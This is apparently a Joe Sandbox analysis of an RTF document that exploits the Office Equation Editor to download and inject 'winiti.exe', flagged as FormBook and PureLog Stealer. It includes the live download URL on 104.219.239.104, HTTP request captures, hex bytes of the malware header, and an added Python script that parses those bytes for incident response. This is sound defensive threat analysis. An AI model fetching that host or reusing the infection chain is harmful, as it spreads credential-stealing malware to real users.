Windows Analysis Report
DzokrPQPdy.rtf

Overview

General Information

Sample name: DzokrPQPdy.rtf
Renamed because the original name is a hash value.
Original sample name: 0a9c028203a8416be8db7371550d0fb5.rtf
Analysis ID: 1483003
MD5: 0a9c028203a8416be8db7371550d0fb5
SHA1: 2f576cdfbf4f60918676f6583265c504bdeefa21
SHA256: a424c4312f97747efa22a627aa0c77c4f11022d171e11d3eeff00dd77b737520
Tags: rtf

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: DzokrPQPdy.rtf Avira: detected
Source: http://104.219.239.104/80/winiti.exe Avira URL Cloud: Label: malware
Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\winiti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.219.239.104 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amWV.pdb source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: amWV.pdbSHA256H! source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
  Date: Fri, 26 Jul 2024 11:43:07 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
  Last-Modified: Tue, 16 Jul 2024 19:13:36 GMT
  ETag: "e8400-61d6224798859"
  Accept-Ranges: bytes
  Content-Length: 951296
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 76 0e 00 00 20 00 00 00 78 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd 95 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 04 05 01 00 4c 55 00 00 03 00 00 00 49 00 00 06 50 5a 01 00 d8 12 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 2a c2 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 02 03 7d 01 00 00 04 2a 00 1b 30 03 00 82 00 00 00 01 00 00 11 00 14 0a 00 72 03 00 00 70 73 16 00 00 0a 0a 06 6f 17 00 00 0a 00 72 ba 00 00 70 0b 07 06 73 18 00 00 0a 0c 73 19 00 00 0a 0d 08 73 1a 00 00 0a 13 04 11 04 09 6f 1b 00 00 0a 26 02 09 6f 1c 00 00 0a 16 6f 1d 00 00 0a 7d 04 00 00 04 02 7b 06 00 00 04 02 7b 04 00 00 04 6f 1e 00 00 0a 00 00 de 13 13 05 00 11 05 6f 1f 00 00 0a 28 20 00 00 0a 26 00 de 00 de 0a 00 06 6f 21 00 00 0a 00 00 dc 2a 00 00 01 1c 00 00 00 00 03 00 5f 62 00 13 20 00 00 01 02 00 03 00 74 77 00 0a 00 00 00 00 13 30 04 00 c2 00 00 00 02 00 00 11 00 02 7b 07 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b
Source: Joe Sandbox View IP Address: 104.219.239.104 104.219.239.104
Source: Joe Sandbox View ASN Name: DATAWAGONUS DATAWAGONUS
Source: global traffic HTTP traffic detected: GET /80/winiti.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 104.219.239.104
  Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104 (50 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A14C26B1-EEA7-4E1B-A080-B2F59643795F}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /80/winiti.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 104.219.239.104
  Connection: Keep-Alive
Source: EQNEDT32.EXE String found in binary or memory: http://104.219.239.104/80/winiti.exe
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exeRea
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exej
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exekkC:
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exez
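
The Data Raw bytes captured from the 200 OK response above are enough to read the delivered file's PE header without ever executing it. The script below is an example added by the editor and is not part of the Joe Sandbox report: it embeds those bytes as transcribed from this page (zero runs written as repetitions), walks the DOS/NT/optional headers and section table, reads the CLR header that data directory 14 points to, and cross-checks the result against the response headers. It shows that the download is a PE32/i386 image with three sections and a .NET (IL-only) CLR header, that its link timestamp is exactly the Last-Modified value, and that the file size implied by the section table equals Content-Length (951296, which is also the "e8400" size field of the Apache ETag). HTTP_CONTENT_LENGTH and HTTP_LAST_MODIFIED are copied from the headers on this page; nothing else is assumed.

```python
"""Parse the PE header bytes that Joe Sandbox captured from the HTTP response
delivering winiti.exe, and cross-check them against the HTTP response headers."""
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Bytes transcribed from the report's "Data Raw" field (file offsets 0x000-0x227 of the
# response body). Zero runs are written as repetitions so their length is explicit.
_HEX = [
    # IMAGE_DOS_HEADER: "MZ" ... e_lfanew = 0x00000080 at offset 0x3c
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00",
    "00 " * 28 + "80 00 00 00",
    # DOS stub
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21",
    b"This program cannot be run in DOS mode.".hex(),
    "0d 0d 0a 24" + " 00" * 7,
    # "PE\0\0" + IMAGE_FILE_HEADER: machine 0x14c, 3 sections, timestamp 0x6696c660, chars 0x0102
    "50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01",
    # IMAGE_OPTIONAL_HEADER32 (96 bytes)
    "0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00",
    "00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00",
    "00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00",
    "00 10 00 00 00 00 00 00 10 00 00 00",
    # 16 data directories (import, resource, basereloc, debug, IAT and CLR are populated)
    "00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00",
    "00 " * 16 + "00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00",
    "00 " * 40 + "00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00",
    # section table: .text, .rsrc, .reloc (40 bytes each)
    "2e 74 65 78 74 00 00 00 24 76 0e 00 00 20 00 00 00 78 0e 00 00 02 00 00" + " 00" * 12 + " 20 00 00 60",
    "2e 72 73 72 63 00 00 00 18 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00" + " 00" * 12 + " 40 00 00 40",
    "2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00" + " 00" * 12 + " 40 00 00 42",
    "00 " * 16,
    # file offset 0x200 = RVA 0x2000: one IAT slot, then IMAGE_COR20_HEADER at RVA 0x2008
    "fd 95 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 04 05 01 00 4c 55 00 00 03 00 00 00 49 00 00 06 50 5a 01 00 d8 12 0d 00",
]
RESPONSE_BODY = bytes.fromhex(" ".join(_HEX))
HTTP_CONTENT_LENGTH = 951296                          # Content-Length header from the report
HTTP_LAST_MODIFIED = "Tue, 16 Jul 2024 19:13:36 GMT"  # Last-Modified header from the report


def parse_pe(data: bytes) -> dict:
    """Walk the DOS header, IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER32 and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24  # optional header follows the 4-byte signature and 20-byte file header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    n_dirs, = struct.unpack_from("<I", data, opt + 92)
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize})
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars, "entry_rva": entry_rva,
            "image_base": image_base, "subsystem": subsystem, "dll_characteristics": dll_chars,
            "dirs": dirs, "sections": sections}


def rva_to_offset(pe: dict, rva: int) -> int:
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} is outside every section")


def clr_header(data: bytes, pe: dict):
    """IMAGE_COR20_HEADER from data directory 14, or None for a native image."""
    rva, _size = pe["dirs"][14]
    if rva == 0:
        return None
    _cb, major, minor, md_rva, _md_size, flags, token = struct.unpack_from("<IHHIIII", data, rva_to_offset(pe, rva))
    return {"runtime": f"{major}.{minor}", "flags": flags, "il_only": bool(flags & 1),
            "entry_token": token, "metadata_rva": md_rva}


def cross_check(pe: dict, content_length: int, last_modified: str) -> dict:
    """Consistency checks a responder can run before executing anything."""
    link_time = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    implied_size = max(s["rawptr"] + s["rawsize"] for s in pe["sections"])  # end of last section on disk
    text = next(s for s in pe["sections"] if s["name"] == ".text")
    return {
        "link_time": link_time.isoformat(),
        "link_time_equals_last_modified": link_time == parsedate_to_datetime(last_modified),
        "implied_file_size": implied_size,
        "content_length_matches": implied_size == content_length,
        "entry_in_text": text["va"] <= pe["entry_rva"] < text["va"] + text["vsize"],
    }


if __name__ == "__main__":
    pe = parse_pe(RESPONSE_BODY)
    print(f"machine={pe['machine']:#x} sections={[s['name'] for s in pe['sections']]}")
    print("CLR header:", clr_header(RESPONSE_BODY, pe))
    print(cross_check(pe, HTTP_CONTENT_LENGTH, HTTP_LAST_MODIFIED))
```

Two of the checks are worth recording in an incident note: the server's file mtime equals the binary's link time to the second, and the Content-Length equals the size the section table implies, so the capture received the complete file and the dropped winiti[1].exe should hash identically to this response body.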

E-Banking Fraud

Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: DzokrPQPdy.rtf, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\winiti.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
